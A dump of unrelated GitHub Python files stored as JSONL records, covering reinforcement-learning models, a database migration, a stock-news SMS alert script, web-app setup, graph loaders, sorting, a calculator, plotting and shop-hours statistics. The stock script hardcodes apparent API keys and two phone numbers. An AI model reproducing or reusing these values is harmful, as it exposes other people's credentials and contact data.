self).__init__()\n self.conv = nn.Sequential(\n # If gray scale, input is 1 channel, else 3 channels\n # nn.Conv2d(3, 32, kernel_size=3, stride=1),\n nn.Conv2d(1, 32, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Conv2d(32, 64, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Conv2d(64, 64, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.Conv2d(64, 1, kernel_size=3, stride=1),\n )\n\n conv_out_size = self._get_conv_out(obs)\n self.fc = nn.Sequential(\n nn.Linear(conv_out_size, 512), nn.ReLU(), nn.Linear(512, action_space)\n )\n\n def _get_conv_out(self, shape):\n o = self.conv(torch.zeros(1, *shape.shape)).flatten().shape[0]\n return o\n\n def forward(self, x):\n conv_out = self.conv(x)\n if x.dim() == 3:\n q_vals = self.fc(conv_out.flatten())\n else:\n q_vals = self.fc(conv_out.flatten(start_dim=1))\n return q_vals\n","repo_name":"treyetzel/Multi-Agent-RL","sub_path":"source/models/idqn_models.py","file_name":"idqn_models.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43836719307","text":"\"\"\"init\n\nRevision ID: e32cf207963c\nRevises: c4d7f9729c0f\nCreate Date: 2023-06-07 11:40:35.480053\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e32cf207963c'\ndown_revision = 'c4d7f9729c0f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('garage_sale',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date', sa.Date(), nullable=False),\n sa.Column('start_time', sa.Time(), nullable=False),\n sa.Column('end_time', sa.Time(), nullable=False),\n sa.Column('street_address', sa.String(length=255), nullable=False),\n sa.Column('city', sa.String(length=255), nullable=False),\n sa.Column('state', sa.String(length=255), nullable=False),\n sa.Column('zip', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('item',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name_of_item', sa.String(length=255), nullable=False),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('category', sa.String(length=255), nullable=True),\n sa.Column('image', sa.String(length=255), nullable=True),\n sa.Column('garage_sale_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['garage_sale_id'], ['garage_sale.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.add_column(sa.Column('contact_number', sa.String(length=255), nullable=True))\n batch_op.create_unique_constraint(None, ['username'])\n batch_op.create_unique_constraint(None, ['email'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='unique')\n batch_op.drop_constraint(None, type_='unique')\n batch_op.drop_column('contact_number')\n\n op.drop_table('item')\n op.drop_table('garage_sale')\n # ### end Alembic commands ###\n","repo_name":"michellestapp/Garage_Sale_Locator","sub_path":"backend/migrations/versions/e32cf207963c_init.py","file_name":"e32cf207963c_init.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25763862754","text":"import requests\nimport os\nfrom datetime import datetime, timedelta\nfrom twilio.rest import Client\n\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\n\nSTOCK_KEY = \"VELO2WIP9B86LL16\"\nNEWS_KEY = \"acaa5932f52f49438c934c27c8cd8046\"\n\nurl = 'https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=IBM&apikey=demo'\nr = requests.get(url)\ndata = r.json()\n\n# TODO 1. - Get yesterday's closing stock price. Hint: You can perform list comprehensions on Python dictionaries. e.g. [new_value for (key, value) in dictionary.items()]\n\ntodays_date = datetime.today().date()\nyesterday_date = datetime.today() - timedelta(days=1)\nyesterday_date = yesterday_date.date()\n\nstock_dates = list(data[\"Time Series (Daily)\"].keys())\n\nstock_first_date_close_price = float(data[\"Time Series (Daily)\"][stock_dates[0]]['4. close'])\n\n# TODO 2. - Get the day before yesterday's closing stock price\n\nstock_second_date_close_price = float(data[\"Time Series (Daily)\"][stock_dates[1]]['4. close'])\n\n# TODO 3. - Find the positive difference between 1 and 2. e.g. 40 - 20 = -20, but the positive difference is 20. Hint: https://www.w3schools.com/python/ref_func_abs.asp\n\nprice_diff = abs(stock_first_date_close_price - stock_second_date_close_price)\n\n# TODO 4. - Work out the percentage difference in price between closing price yesterday and closing price the day before yesterday.\n\npercentage_diff = (price_diff / stock_second_date_close_price) * 100\n\n# TODO 5. - If TODO4 percentage is greater than 5 then print(\"Get News\").\n# TODO 6. - Instead of printing (\"Get News\"), use the News API to get articles related to the COMPANY_NAME.\n\n## STEP 2: https://newsapi.org/\n# Instead of printing (\"Get News\"), actually get the first 3 news pieces for the COMPANY_NAME.\n\nnews_parameters = {\n \"q\": \"ibm\",\n \"from\": \"todays_date\",\n \"sortBy\": \"publishedAt\",\n \"apiKey\": NEWS_KEY,\n \"language\": 'en',\n}\n\nnews_url = NEWS_ENDPOINT\nnews_r = requests.get(news_url, params=news_parameters)\nnews_data = news_r.json()\n\narticles = news_data[\"articles\"]\n\nnews = {}\n\nfor i in range(3):\n title = articles[i][\"title\"]\n description = articles[i][\"description\"]\n news[title] = description\n\n# TODO 7. - Use Python slice operator to create a list that contains the first 3 articles. Hint: https://stackoverflow.com/questions/509211/understanding-slice-notation\n# TODO 8. - Create a new list of the first 3 article's headline and description using list comprehension.\n# TODO 9. - Send each article as a separate message via Twilio.\n\naccount_sid = \"YOUR ACCOUNT SID\"\nauth_token = os.environ.get(\"AUTH_TOKEN\")\n\nclient = Client(account_sid, auth_token)\n\nif stock_first_date_close_price >= stock_second_date_close_price:\n for k, v in news.items():\n message = client.messages \\\n .create(\n body=f\"IBM: 🔺{round(percentage_diff)}%\\nHeadline: {k}\\nBrief: {v}\",\n from_=\"+17853775297\",\n to=\"+48695391444\"\n )\nelse:\n for k, v in news.items():\n message = client.messages \\\n .create(\n body=f\"IBM: 🔻{round(percentage_diff)}%\\nHeadline: {k}\\nBrief: {v}\",\n from_=\"+17853775297\",\n to=\"+48695391444\"\n )\n\n## STEP 3: Use twilio.com/docs/sms/quickstart/python\n# to send a separate message with each article's title and description to your phone number.\n\n\n\n\n# Optional TODO: Format the message like this:\n\"\"\"\nTSLA: 🔺2%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. \nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\nor\n\"TSLA: 🔻5%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. \nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\n\"\"\"\n","repo_name":"eughrat/100daysChallenge","sub_path":"day_36/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74741406771","text":"import logging\nfrom collections import namedtuple\n\nfrom bson import DEFAULT_CODEC_OPTIONS\nfrom scrapy import Spider\nfrom scrapy.settings import Settings\nfrom twisted.internet.defer import inlineCallbacks\nfrom txmongo.connection import ConnectionPool\n\nfrom ..settings.default_settings import MONGODB_COLLECTION\nfrom ..settings.default_settings import MONGODB_DATABASE\nfrom ..utils.get_mongo_uri import get_mongo_uri\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = namedtuple('twitter_token', ['client_key',\n 'client_secret'\n 'resource_owner_key',\n 'resource_owner_secret'])\n\n\nclass MongoDBStorage(object):\n\n def __init__(self, settings: Settings):\n self.settings = settings\n self.uri = get_mongo_uri(self.settings)\n self.codec_options = DEFAULT_CODEC_OPTIONS.with_options(\n unicode_decode_error_handler='ignore')\n self.cnx = None\n self.db = None\n self.coll = None\n\n @inlineCallbacks\n def open_spider(self, spider: Spider):\n self.cnx = yield ConnectionPool(\n self.uri,\n codec_options=self.codec_options\n )\n\n self.db = yield getattr(\n self.cnx,\n self.settings[MONGODB_DATABASE]\n )\n self.coll = yield getattr(\n self.db,\n self.settings[MONGODB_COLLECTION]\n )\n self.coll.with_options(codec_options=self.codec_options)\n\n logger.info(\n 'Spider opened: Open the connection to MongoDB: {}'.format(self.uri)\n )\n\n @inlineCallbacks\n def close_spider(self, spider: Spider):\n yield self.cnx.disconnect()\n logger.info(\n 'Spider closed: Close the connection to MongoDB: {}'.format(\n self.uri)\n )\n\n @inlineCallbacks\n def retrieve_token(self):\n docs = yield self.coll.find()\n return {doc.pop('_id'): doc for doc in docs}\n","repo_name":"leonardfrank/scrapy-httpoauth","sub_path":"scrapy_httpoauth/extensions/httpoauth.py","file_name":"httpoauth.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35422549858","text":"from flask import Flask\n\nfrom thisdayinmusic import auth, api\nfrom thisdayinmusic.extensions import db, jwt, migrate\n\n\ndef create_app(config=None, testing=False, cli=False):\n \"\"\"Application factory, used to create application\n \"\"\"\n app = Flask('thisdayinmusic')\n\n configure_app(app, testing)\n configure_extensions(app, cli)\n register_blueprints(app)\n\n return app\n\n\ndef configure_app(app, testing=False):\n \"\"\"set configuration for application\n \"\"\"\n # default configuration\n app.config.from_object('thisdayinmusic.config')\n\n if testing is True:\n # override with testing config\n app.config.from_object('thisdayinmusic.configtest')\n else:\n # override with env variable, fail silently if not set\n app.config.from_envvar(\"THISDAYINMUSIC_CONFIG\", silent=True)\n\n\ndef configure_extensions(app, cli):\n \"\"\"configure flask extensions\n \"\"\"\n db.init_app(app)\n jwt.init_app(app)\n\n if cli is True:\n migrate.init_app(app, db)\n\n\ndef register_blueprints(app):\n \"\"\"register all blueprints for application\n \"\"\"\n app.register_blueprint(auth.views.blueprint)\n app.register_blueprint(api.views.blueprint)\n","repo_name":"Shemahmforash/api.thisdayinmusic.net","sub_path":"thisdayinmusic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12855335458","text":"from dgl.data import load_data, tu\nfrom dgl import DGLGraph, transform\nimport torch\nimport torch.utils.data\nimport numpy as np\nimport torch\nimport dgl\nimport networkx as nx\nfrom datasets.prepocessing import one_class_processing\nimport pickle\n\ndef load_cn_data(path='/Users/mtang/Documents/OCGNN/data/baseline_networkx_combinedAttr_0724.pkl'):\n a_file = open(path, \"rb\")\n data = pickle.load(a_file)\n a_file.close()\n nx_ls, label_ls = data[0], data[1]\n return nx_ls, label_ls\n\ndef loader(args, index):\n # load and preprocess dataset\n \n # data = load_data(args)\n data_ls, label_ls = load_cn_data()\n graph = data_ls[index]\n label = np.array(list(nx.get_node_attributes(graph, 'have_diag').values()))\n # print(nx.get_node_attributes(graph,'call_count').values())\n # g = dgl.from_networkx(data, node_attrs=['tariftype', 'call_count', 'total_call_len',\n # 'lat', 'lon', 'unique_locations_visited', 'avg_call_len',\n # 'sub_or_ob', 'missing', 'have_diag'], edge_attrs=['weight'])\n\n print(f'normal_class is {args.normal_class}')\n\n labels, train_mask, val_mask, test_mask = one_class_processing((graph, label), 0, args)\n\n # features = torch.FloatTensor(nx.attr_matrix(graph, node_attr=\"combine\", normalized=True))\n print(train_mask)\n features = torch.FloatTensor(list(nx.get_node_attributes(graph, 'combine').values()))\n print(features.shape)\n labels = torch.LongTensor(labels)\n train_mask = torch.BoolTensor(train_mask)\n val_mask = torch.BoolTensor(val_mask)\n test_mask = torch.BoolTensor(test_mask)\n in_feats = features.shape[1]\n # n_classes = data.num_labels\n n_classes = 2\n n_edges = graph.number_of_edges()\n print(test_mask.sum().item())\n # print(\"\"\"----Data statistics------'\n # #Edges %d\n # #Classes %d\n # #Train samples %d\n # #Val samples %d\n # #Test samples %d\"\"\" %\n # (n_edges, n_classes,\n # train_mask.sum().item(),\n # val_mask.sum().item(),\n # test_mask.sum().item()))\n print(n_edges, n_classes,\n train_mask.sum().item(),\n val_mask.sum().item(),\n test_mask.sum().item())\n if args.gpu < 0:\n cuda = False\n else:\n cuda = True\n torch.cuda.set_device(args.gpu)\n features = features.cuda()\n labels = labels.cuda()\n train_mask = train_mask.cuda()\n val_mask = val_mask.cuda()\n test_mask = test_mask.cuda()\n\n # graph preprocess and calculate normalization factor\n g = graph\n\n # add self loop\n if args.self_loop:\n g.remove_edges_from(nx.selfloop_edges(g))\n #g=transform.remove_self_loop(g)\n #if args.module!='GraphSAGE':\n g.add_edges_from(zip(g.nodes(), g.nodes()))\n\n # g = DGLGraph(g)\n g = dgl.from_networkx(graph)\n n_edges = g.number_of_edges()\n if args.norm:\n \n # normalization\n degs = g.in_degrees().float()\n norm = torch.pow(degs, -0.5)\n norm[torch.isinf(norm)] = 0\n if cuda:\n norm = norm.cuda()\n g.ndata['norm'] = norm.unsqueeze(1)\n\n datadict={'g':g,'features':features,'labels':labels,'train_mask':train_mask,\n 'val_mask':val_mask,'test_mask': test_mask,'input_dim':in_feats,'n_classes':n_classes,'n_edges':n_edges}\n\n return datadict, graph\n\ndef emb_dataloader(args):\n # load and preprocess dataset\n data = load_data(args)\n normal_class=args.normal_class\n labels,train_mask,val_mask,test_mask=one_class_processing(data,normal_class,args)\n\n features = torch.FloatTensor(data.features)\n labels = torch.LongTensor(labels)\n train_mask = torch.BoolTensor(train_mask)\n val_mask = torch.BoolTensor(val_mask)\n test_mask = torch.BoolTensor(test_mask)\n in_feats = features.shape[1]\n n_classes = data.num_labels\n n_edges = data.graph.number_of_edges()\n print(\"\"\"----Data statistics------'\n #Edges %d\n #Classes %d\n #Train samples %d\n #Val samples %d\n #Test samples %d\"\"\" %\n (n_edges, n_classes,\n train_mask.sum().item(),\n val_mask.sum().item(),\n test_mask.sum().item()))\n\n g = data.graph\n\n\n datadict={'g':g,'features':features,'labels':labels,'train_mask':train_mask,\n 'val_mask':val_mask,'test_mask': test_mask,'in_feats':in_feats,'n_classes':n_classes,'n_edges':n_edges}\n\n return datadict","repo_name":"mtang724/OCGNN","sub_path":"datasets/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3959112809","text":"import gdown\nimport sys\n\nsys.setrecursionlimit(100_000_000)\n\n\ndef swap(arr, a, b):\n arr[a], arr[b] = arr[b], arr[a]\n\n\ndef pivot1(arr, l):\n return arr[l]\n\n\ndef pivot2(arr, l, r):\n # pivotを常に先頭に持ってくるためにswapする\n swap(arr, l, r)\n return pivot1(arr, l)\n\n\ndef pivot3(arr, l, r): # 配列の先頭、真ん中、最後の要素の中央値を返す\n m = l + ((r - l) // 2)\n\n tmp = [arr[l], arr[m], arr[r]]\n\n mx = max(tmp)\n mn = min(tmp)\n\n tmp.remove(mx)\n tmp.remove(mn)\n\n mid_idx = arr.index(tmp[0])\n swap(arr, l, mid_idx)\n\n return pivot1(arr, l)\n\n\ndef partition(arr, l, r): # l, r: 各ルーティン内の探索範囲\n if l >= r:\n return 0\n\n # p = pivot1(arr, l)\n # p = pivot2(arr, l, r)\n p = pivot3(arr, l, r)\n\n i = l + 1\n\n for j in range(l+1, r+1):\n if arr[j] < p:\n swap(arr, j, i)\n i += 1\n\n swap(arr, arr.index(p), i-1)\n\n m = partition(arr, l, i - 2)\n n = partition(arr, i, r)\n\n return m + n + (r - l) # 長さmのsubarrayがあるとすると m - 1 = r - l\n\n\ndef main():\n url = 'url of input file'\n output = 'file.txt'\n gdown.download(url, output, quiet=False)\n\n with open(output) as f:\n numbers = [int(s.strip()) for s in f.readlines()]\n\n ans = partition(numbers, 0, len(numbers) - 1)\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sy-tencho/algorithms_specialization","sub_path":"part1/week3/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"453378465","text":"import numpy as np\n\n# Define Rotation Matrix (4X4)\nclass Rotation:\n def E():\n E = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 0]])\n return E\n\n def x(theta):\n theta = np.deg2rad(theta)\n Rot_x = np.array([[1, 0, 0, 0],\n [0, np.cos(theta), -np.sin(theta), 0],\n [0, np.sin(theta), np.cos(theta), 0],\n [0, 0, 0, 0]])\n return Rot_x\n\n def y(theta):\n theta = np.deg2rad(theta)\n Rot_y = np.array([[np.cos(theta), 0, np.sin(theta), 0],\n [0, 1, 0, 0],\n [-np.sin(theta), 0, np.cos(theta), 0],\n [0, 0, 0, 0]])\n return Rot_y\n\n def z(theta):\n theta = np.deg2rad(theta)\n Rot_z = np.array([[np.cos(theta), -np.sin(theta), 0, 0],\n [np.sin(theta), np.cos(theta), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 0]])\n return Rot_z\n\n\n# Define Translation Matrix (4X4)\ndef Translation(x, y, z):\n P = np.array([[0, 0, 0, x],\n [0, 0, 0, y],\n [0, 0, 0, z],\n [0, 0, 0, 1]])\n return P\n\n\n# calculate Homogeneous Transformation marix\ndef HT_matrix(R, P):\n # Note : R&P are np_array form\n H = R + P\n return H","repo_name":"tmjeong1103/Forward_Kinematics_hardcoding","sub_path":"FK_simul/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74985196213","text":"# -*- coding: utf-8 -*- \nimport sys\nimport math\nimport logging\nimport doctest\n\n\nlogging.basicConfig(filename='program.log', format='%(asctime)s %(message)s',level=logging.DEBUG)\n\n\n# Definição das funções \ndef soma(arg1, arg2):\n \"\"\"\n >>> soma(2, 2) # testes soma\n 4\n >>> soma(1, 1)\n 2\n >>> soma(-2, 4)\n 2\n \"\"\" \n print(arg1 + arg2)\n\ndef subt(arg1, arg2):\n \"\"\"\n >>> subt(2, 2) # testes subtracao \n 0\n >>> subt(10, 1)\n 9\n >>> subt(-2, 4)\n -6\n \"\"\"\n print(arg1 - arg2)\n\ndef mult(arg1, arg2):\n \"\"\"\n >>> mult(2, 2) # testes multiplicacao\n 4\n >>> mult(10, 10)\n 100\n >>> mult(-2, 4)\n -8\n \"\"\"\n print(round((arg1 * arg2), 2))\n\ndef div(arg1, arg2):\n try:\n arg1 / arg2\n \"\"\"\n >>> div(2, 2) # testes divisao\n 1\n >>> div(10, 2)\n 5\n >>> div(2, 4)\n 0.5\n \"\"\"\n print(round((arg1 / arg2), 2))\n except Exception as e: # tratamento do erro divisor 0\n logging.exception(\"Exception Occurred\")\n\ndef pot(arg1, arg2):\n \"\"\"\n >>> pot(2, 2) # testes potencia\n 4.0\n >>> pot(10, 3)\n 1000.0\n >>> pot(5, 4)\n 625.0\n \"\"\"\n print(round(math.pow(arg1, arg2), 2))\n\ndef mod(arg1, arg2):\n \"\"\"\n >>> mod(2, 2) # testes modulo\n 0\n >>> mod(10, 3)\n 1\n >>> mod(1235, 4)\n 3\n \"\"\"\n print(round((arg1 % arg2), 2))\n\ndef main():\n\n if len(sys.argv) == 4: # tamanho do array pra verificar a quantidade de argumentos\n \n # Criação de variáveis para armazenar os valores passados pelo terminal\n try:\n arg1 = float (sys.argv[1])\n arg2 = float (sys.argv[3])\n argOperador = sys.argv[2]\n logging.info('Calculator app started with values: %.2f e %.2f', arg1, arg2) # log mostrando os valores iniciais\n try:\n if argOperador == '+':\n soma(arg1, arg2)\n elif argOperador == '-':\n subt(arg1, arg2)\n elif argOperador == '*':\n mult(arg1, arg2)\n elif argOperador == '/':\n div(arg1, arg2)\n elif argOperador == '**':\n pot(arg1, arg2)\n elif argOperador == 'mod' or argOperador == '%':\n mod(arg1, arg2)\n else: \n print(\"Erro: Operação inválida.\")\n except Exception as e:\n logging.exception(\"Exception Occurred\") \n except Exception as e:\n logging.error(\"Erro. os argumentos precisam ser numericos.\") # tratamento de exceção caso nao entre com numericos\n else:\n logging.error(\"Erro. Expressão precisa ser simples.\") # tratamento de exceção caso tenha mais de 2 argumentos iniciais\n \n \n doctest.testmod()\nmain()\n","repo_name":"FabbSantos/calculadora_proj","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70754997812","text":"import sys\n\nimport unittest\n\nsys.path.append('neuxus')\nsys.path.append('tests/nodes')\n\nfrom utils import (INDEX, COLUMN, simulate_loop_and_verify)\nfrom chunks import Port\nfrom nodes.function import ApplyFunction\n\n\nclass TestFunction(unittest.TestCase):\n\n def test_apply_function(self):\n # create a Port and a Node\n port = Port()\n port.set_parameters(\n data_type='signal',\n channels=COLUMN,\n sampling_frequency=250,\n meta={})\n node = ApplyFunction(port, lambda x: x**2)\n\n # simulate NeuXus loops\n simulate_loop_and_verify(port, node, self)\n","repo_name":"LaSEEB/NeuXus","sub_path":"tests/nodes/test_function.py","file_name":"test_function.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"34025205057","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\n'''\nExpect to have a file like that:\nlist of [perfs, stds, q, q_diff, q_diff_abs, err_proj, err_proj_abs]\nperfs, stds, err_proj, err_proj_abs have:\n - a list of [P1, P2, P4...]\n - each with a list of [iter1, iter2, ...]\nq, q_diff, q_diff_abs have:\n - a list of [P1, P2, P4...]\n - each with a list of items evaluated in [sa, sa_greedy, s0a_greedy]\n - each with a list of [iter1, iter2, ...]\n \n'''\n\nfile_name = sys.argv[1]\ncolors = ['dodgerblue', 'cyan', 'limegreen', 'chartreuse', 'gold', 'orange', 'r', 'm', 'darkorchid']\ndalton_friendly_colors = ['deepskyblue', 'mediumslateblue', 'deeppink', 'darkorange', 'gold']\n\nfinal_colors = colors\nsa_index = 0 # 0 for sa, 1 for sa_greedy, 2 for s0a_greedy\ngamma_default = 0.99 ** (1/3)\n\nwith open(file_name, 'r') as f:\n file = json.load(f)\n\n'''\nsave_step added later in position [7], if len(file)==7 there is no save_step\n'''\nif len(file) >= 8:\n save_step = file[7]\nelse:\n save_step = 1\n\n'''\ngamma added later in position [8], if len(file)<9 there is no gamma\n'''\nif len(file) >= 9:\n gamma = file[8]\nelse:\n gamma = gamma_default\n\npersistences_number = len(file[0])\n\n# file filtering\n# for i in range(2):\n# for j in range(len(file[i+3])):\n# for k in range(len(file[i + 3][j])):\n# if len(file[i+3][j][k]) is not 0:\n# file[i+3][j][k].pop(0)\n#\n# for i in range(len(file)):\n# if i < 2 or i > 4:\n# for j in range(len(file[i])):\n# if file[i][j] != []:\n# file[i][j].pop(0)\n#\n# for j in range(len(file[2])):\n# for k in range(len(file[2][j])):\n# del file[2][j][k][-1]\n\nvalid_iterations_perfs = []\nfor i in range(persistences_number):\n l = list(range(len(file[0][i])))\n valid_iterations_perfs.append([(j * max(2 ** i, save_step)) + max(2 ** i, save_step) for j in l])\n\nvalid_iterations_bound = []\nfor i in range(persistences_number):\n l = list(range(len(file[2][i][0])))\n valid_iterations_bound.append([(j * max(2 ** i, save_step)) for j in l])\n\nfig, ax = plt.subplots(nrows=2, ncols=2)\n\n# plot perf\n# ax[0][0].set(ylabel='performances')\n# for i in range(persistences_number):\n# ax[0][0].plot(valid_iterations[i], file[0][i], '.', color=final_colors[i], label='P{}'.format(2**i))\n# ax[0][0].errorbar(valid_iterations[i], file[0][i], yerr=file[1][i], linestyle='', color=final_colors[i])\n\nax[0][0].set(ylabel='performances')\nfor i in range(persistences_number):\n ax[0][0].plot(valid_iterations_perfs[i], file[0][i], '-', color=final_colors[i], label='P{}'.format(2**i))\n\n# plot q\nax[1][0].set(ylabel='Q_functions')\nfor i in range(persistences_number):\n ax[1][0].plot(valid_iterations_bound[i], file[2][i][2], '-', color=final_colors[i])\n\n# plot q_diff_abs\nax[0][1].set(ylabel='Q_diff_abs')\nfor i in range(persistences_number):\n ll = min(len(valid_iterations_bound[i]), len(file[4][i][0]))\n ax[0][1].plot(valid_iterations_bound[i][:ll], file[4][i][0][:ll], '-', color=final_colors[i])\n\n# plot bound abs\nax[1][1].set(ylabel='Q(sa0greedy) - Q_diff_abs(sa)')\nfor i in range(persistences_number):\n ll = min(len(valid_iterations_bound[i]), len(file[4][i][0]))\n bound = file[2][i][2][:ll] - ((1-gamma**(2**i)) ** -1) * (np.array(file[4][i][0][:ll]))\n ax[1][1].plot(valid_iterations_bound[i], bound, '-', color=final_colors[i])\n\nax[0][0].legend(ncol=len(file[0]), bbox_to_anchor=(0, 1), loc='lower left', fontsize='small')\n\nplt.show()\n","repo_name":"albertometelli/pfqi","sub_path":"plotters/multi_perf_plotter4x4.py","file_name":"multi_perf_plotter4x4.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"34467271761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 20 09:18:43 2021\n\n@author: CWilson\n\"\"\"\n\nimport sys\nsys.path.append('c://users//cwilson//documents//python//Weekly Shop Hours Project//')\n# from TimeClock_Tools_Employee_Department import download_most_current_employee_department_csv\n# from Grab_Fabrication_Google_Sheet_Data import grab_google_sheet\nfrom Grab_Defect_Log_Google_Sheet_Data import grab_defect_log\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom Fitter_Welder_Stats_functions import clean_and_adjust_fab_listing_for_range\nfrom Fitter_Welder_Stats_functions import return_sorted_and_ranked\nfrom Fitter_Welder_Stats_functions import convert_weight_to_earned_hours\nfrom Fitter_Welder_Stats_functions import get_employee_name_ID\nfrom Fitter_Welder_Stats_functions import download_employee_group_hours\nfrom Fitter_Welder_Stats_functions import get_employee_hours\nfrom Fitter_Welder_Stats_functions import combine_multiple_all_both_csv_files_into_one_big_one\nfrom Gather_data_for_timeclock_based_email_reports import get_information_for_clock_based_email_reports\nfrom Gather_data_for_timeclock_based_email_reports import skip_timeclock_automated_retrieval\nfrom Gather_data_for_timeclock_based_email_reports import get_ei_csv_downloaded\n\n\n\nstate = 'TN'\nstart_date = \"01/01/2023\"\nend_date = \"01/31/2023\"\nstates = ['TN','MD','DE']\n\n\n\n# ei = get_employee_name_ID()\n# hours_df = download_employee_group_hours(start_date, end_date)\n\n\n# basis = get_information_for_clock_based_email_reports(start_date, end_date, exclude_terminated=False)\n\n\n\nei = get_ei_csv_downloaded(exclude_terminated=False)\n\nstart_dt = datetime.datetime.strptime(start_date, '%m/%d/%Y')\nend_dt = datetime.datetime.strptime(end_date, '%m/%d/%Y')\n\n\nclock_df, direct, indirect = None, None, None\n\n\nfor num_day in range(0, (end_dt-start_dt).days + 1):\n# for num_day in range(0,7):\n \n day_str = (start_dt + datetime.timedelta(days=num_day)).strftime('%m/%d/%Y')\n \n try:\n this_day = get_information_for_clock_based_email_reports(day_str, day_str, exclude_terminated=False, ei=ei)\n if this_day is None:\n continue\n except:\n continue\n \n\n \n # should not hit this part if this_day is none\n loop_clock_df = this_day['Clocks Dataframe']\n loop_direct_df = this_day['Direct']\n loop_indirect_df = this_day['Indirect']\n \n \n #iteratively add each days data to a main dataframe\n if clock_df is None:\n clock_df = loop_clock_df\n else:\n clock_df = clock_df.append(loop_clock_df, ignore_index=True)\n if direct is None:\n direct = loop_direct_df\n else:\n direct = direct.append(loop_direct_df, ignore_index=True)\n if indirect is None:\n indirect = loop_indirect_df\n else:\n indirect = indirect.append(loop_indirect_df, ignore_index=True) \n \n\n\n\nhours_df = clock_df\n\n\n\n\n\n\nfor state in states:\n print(state)\n # get the defect log data for that time range\n # this way it only pulls the defect log information once per state\n defect_log = grab_defect_log(state, start_date, end_date)\n \n # get the dataframe of FabListing for that time range & state\n fablisting_cleaned = clean_and_adjust_fab_listing_for_range(state, \n start_date, \n end_date, \n earned_hours = 'model')\n # earned_hours='old way')\n df = fablisting_cleaned['Fab df']\n # df = df.rename(columns={'Earned Hours':'EVA Hours'})\n # it also gets the unique fitters and welders from the dataframe\n fitters = fablisting_cleaned['Fitter list']\n welders = fablisting_cleaned['Welder list']\n \n \n ''' IF EITHER OF THE FITTER_DATA OR WELDER_DATA THROWS AN ERROR REFER TO THE DEFINED FUNCTION '''\n ''' Or you can just run from line 72 down to these functions and look at the printed output '''\n # get only the fitter information retrieved form the dataframe\n fitter_data = return_sorted_and_ranked(df, ei, fitters, \"Fitter\", defect_log, state, \n start_date, end_date)\n # get only the welder information retrieved form the dataframe\n welder_data = return_sorted_and_ranked(df, ei, welders, \"Welder\", defect_log, state, \n start_date, end_date)\n \n # fitter_data = convert_weight_to_earned_hours(state, 